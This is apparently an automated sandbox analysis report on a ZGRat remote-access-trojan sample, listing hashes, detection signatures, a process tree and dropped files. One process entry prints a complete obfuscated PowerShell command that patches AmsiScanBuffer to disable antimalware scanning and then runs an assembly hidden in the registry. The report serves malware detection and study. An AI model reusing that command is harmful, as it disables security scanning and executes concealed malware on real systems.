Analysis

  • max time kernel
    113s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 01:22

Errors

Reason
Machine shutdown

General

  • Target

    133fda00a490e613f3a6c511c1c660eb.exe

  • Size

    4.5MB

  • MD5

    133fda00a490e613f3a6c511c1c660eb

  • SHA1

    e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

  • SHA256

    cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

  • SHA512

    f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

  • SSDEEP

    24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:

Score
10/10

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:616
    • C:\Windows\system32\dwm.exe
      "dwm.exe"
      2⤵
        PID:60
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{0aaf3614-dbb1-43c9-9e5d-cd0b2b734deb}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2336
      • C:\Windows\system32\wlrmdr.exe
        -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:4444
    • C:\Windows\system32\lsass.exe
      C:\Windows\system32\lsass.exe
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:684
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
      1⤵
        PID:964
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
        1⤵
          PID:400
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:904
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
            1⤵
              PID:1036
              • C:\Windows\system32\taskhostw.exe
                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                2⤵
                  PID:3064
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:axylMltnpBep{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CXiJXfVxnkdRml,[Parameter(Position=1)][Type]$VuxHBlLMlw)$DfakNndwyPK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+'o'+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$DfakNndwyPK.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+'am'+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+'u'+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$CXiJXfVxnkdRml).SetImplementationFlags(''+[Char](82)+'un'+'t'+'im'+'e'+''+','+'M'+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$DfakNndwyPK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+'V'+''+'i'+'rtu'+'a'+'l',$VuxHBlLMlw,$CXiJXfVxnkdRml).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $DfakNndwyPK.CreateType();}$waskEbzTPtUNn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+'e'+'m'+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+'f'+'t'+''+'.'+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+'Na'+'t'+''+'i'+''+'v'+''+'e'+'M'+[Char](101)+'t'+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$NpcZZoKdDOoebt=$waskEbzTPtUNn.GetMethod(''+'G'+'e'+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+'d'+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+'t'+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ugOEbBiWAhFGOeacujA=axylMltnpBep @([String])([IntPtr]);$lWgPbiiipEWoIthNRTnKvp=axylMltnpBep @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$UnpskIbieQE=$waskEbzTPtUNn.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$IJdOrPdYiSFhDw=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$UnpskIbieQE,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$JfvaoopxDKNVKXRIX=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$UnpskIbieQE,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$jTgnQTX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJdOrPdYiSFhDw,$ugOEbBiWAhFGOeacujA).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+'l'+'');$DsFyAWBNMmRMPMhSV=$NpcZZoKdDOoebt.Invoke($Null,@([Object]$jTgnQTX,[Object](''+'A'+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$voYJXCfEms=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JfvaoopxDKNVKXRIX,$lWgPbiiipEWoIthNRTnKvp).Invoke($DsFyAWBNMmRMPMhSV,[uint32]8,4,[ref]$voYJXCfEms);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DsFyAWBNMmRMPMhSV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JfvaoopxDKNVKXRIX,$lWgPbiiipEWoIthNRTnKvp).Invoke($DsFyAWBNMmRMPMhSV,[uint32]8,0x20,[ref]$voYJXCfEms);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                  2⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2728
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    3⤵
                      PID:4480
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1112
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1128
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1268
                        • C:\Windows\system32\sihost.exe
                          sihost.exe
                          2⤵
                            PID:1148
                          • C:\Windows\system32\sihost.exe
                            sihost.exe
                            2⤵
                              PID:3788
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                                PID:3852
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:4600
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:3684
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:5068
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1300
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                      1⤵
                                      • Drops file in System32 directory
                                      PID:1324
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                      1⤵
                                        PID:1460
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1480
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1496
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                            1⤵
                                              PID:1540
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1612
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1652
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                  1⤵
                                                    PID:1660
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1748
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      1⤵
                                                        PID:1764
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:1876
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:1884
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                            1⤵
                                                              PID:1908
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                              1⤵
                                                                PID:1940
                                                              • C:\Windows\System32\spoolsv.exe
                                                                C:\Windows\System32\spoolsv.exe
                                                                1⤵
                                                                  PID:1376
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                  1⤵
                                                                    PID:2100
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                    1⤵
                                                                      PID:2164
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                        PID:2348
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                        1⤵
                                                                          PID:2388
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                          1⤵
                                                                            PID:2400
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                            1⤵
                                                                            • Drops file in System32 directory
                                                                            PID:2532
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2580
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2628
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2660
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2672
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2824
                                                                                  • C:\Windows\system32\wbem\unsecapp.exe
                                                                                    C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                    1⤵
                                                                                      PID:2984
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                      1⤵
                                                                                        PID:428
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3352
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3452
                                                                                          • C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\133fda00a490e613f3a6c511c1c660eb.exe"
                                                                                            2⤵
                                                                                            • Drops startup file
                                                                                            • Suspicious use of SetThreadContext
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4052
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$774c65ac
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$774c65ac"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2204
                                                                                            • C:\Users\Admin\AppData\Local\Temp\$77d7e828
                                                                                              "C:\Users\Admin\AppData\Local\Temp\$77d7e828"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1352
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 308
                                                                                                4⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Program crash
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:836
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 312
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:2236
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                          1⤵
                                                                                            PID:3572
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:3764
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:3920
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4160
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4520
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4028
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:3648
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:3676
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                          1⤵
                                                                                                            PID:1532
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                            1⤵
                                                                                                              PID:2752
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                              1⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:3448
                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                              1⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:2332
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                              1⤵
                                                                                                                PID:4248
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:2848
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                  1⤵
                                                                                                                    PID:4448
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:3292
                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                      1⤵
                                                                                                                        PID:2644
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                        1⤵
                                                                                                                          PID:2772
                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2608
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:1924
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1352 -ip 1352
                                                                                                                            2⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:944
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1352 -ip 1352
                                                                                                                            2⤵
                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                            PID:1852

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9E.tmp.csv

                                                                                                                          Filesize

                                                                                                                          34KB

                                                                                                                          MD5

                                                                                                                          7a1d8b9bc872d536c99c49fc81b39aab

                                                                                                                          SHA1

                                                                                                                          fb67a4ca4dbe30de3cbabf33e75aeec1f980f65c

                                                                                                                          SHA256

                                                                                                                          11ed79541da28d682c93af5d1b6f89275d91d96f50e12064ce9cd17b8c89337f

                                                                                                                          SHA512

                                                                                                                          8b3c3e80657fac93ef72d9588ec3a4a4aec38fd95c4087012494095b93db39922b62dcffbf58bcdeaf2604c7e6b3444c50af1be29e5002d8a351781c0b20fe6e

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERABE.tmp.txt

                                                                                                                          Filesize

                                                                                                                          13KB

                                                                                                                          MD5

                                                                                                                          4ac3d9ef61e234f69c14786c2d8b90b3

                                                                                                                          SHA1

                                                                                                                          238f18f2a77f1db5cd2bb7c8d81b2fe28cd08069

                                                                                                                          SHA256

                                                                                                                          b859584d5c1b2cc5e4df19d4defab0ffd987671a18c717f55d5562377f07316d

                                                                                                                          SHA512

                                                                                                                          5a7fbc03af0bc8f8bf90659e3473fe13e8654651b4b80f738261336100939340428f33edff3edbdf833584e3c42d44cdccaf5c4af5b86e867cfaee7fb775ceb3

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD8.tmp.csv

                                                                                                                          Filesize

                                                                                                                          34KB

                                                                                                                          MD5

                                                                                                                          410ecd12129c57f399cb89f57f26472d

                                                                                                                          SHA1

                                                                                                                          34a42ca1d550a78a9820c381014c5c28a2fecefd

                                                                                                                          SHA256

                                                                                                                          441dc75ae1b9b65dd73ad4db78e9d29501dfce4be6ed993fcdd0ecacb8a190cd

                                                                                                                          SHA512

                                                                                                                          aee83b4cecbb33e50f083aa54f91a113865be0d9483aee52fac03c7940e6ece04cef4d9210e3eb05a5dd7ded8b29ed316c6ecd2ab873772a0c51e428e6aa49e1

                                                                                                                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE9.tmp.txt

                                                                                                                          Filesize

                                                                                                                          13KB

                                                                                                                          MD5

                                                                                                                          9b79b44a0c52afd118510f24b1dc929a

                                                                                                                          SHA1

                                                                                                                          27b7b56e860b2d6150a24f2ff0183079a682663e

                                                                                                                          SHA256

                                                                                                                          8575ddbec3278573f891ded85d5d68539edafb1361d198dd34140140daa3e0be

                                                                                                                          SHA512

                                                                                                                          ad12be1ec48d0f3b3467aed6f4a4f4e515258f028b3e1497847698b3fb92c8590fbf54bca0f81305f816e93b69dc0749280c42909b347f562abe0f131684661f

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\$774c65ac

                                                                                                                          Filesize

                                                                                                                          4.5MB

                                                                                                                          MD5

                                                                                                                          133fda00a490e613f3a6c511c1c660eb

                                                                                                                          SHA1

                                                                                                                          e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

                                                                                                                          SHA256

                                                                                                                          cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

                                                                                                                          SHA512

                                                                                                                          f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

                                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_dbzrlniu.mhw.ps1

                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • memory/400-5893-0x00000202DED30000-0x00000202DED55000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/400-4999-0x00000202DED30000-0x00000202DED55000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/616-4946-0x0000015086780000-0x00000150867A5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/616-4947-0x00007FFFF6DCD000-0x00007FFFF6DCE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/684-4959-0x00007FFFF6DCF000-0x00007FFFF6DD0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/964-4985-0x00007FFFF6DCC000-0x00007FFFF6DCD000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/964-4984-0x000001E84DB90000-0x000001E84DBB5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/964-5892-0x000001E84DB90000-0x000001E84DBB5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/2204-4898-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/2728-5226-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2728-4913-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2728-4914-0x000001D702610000-0x000001D70263A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

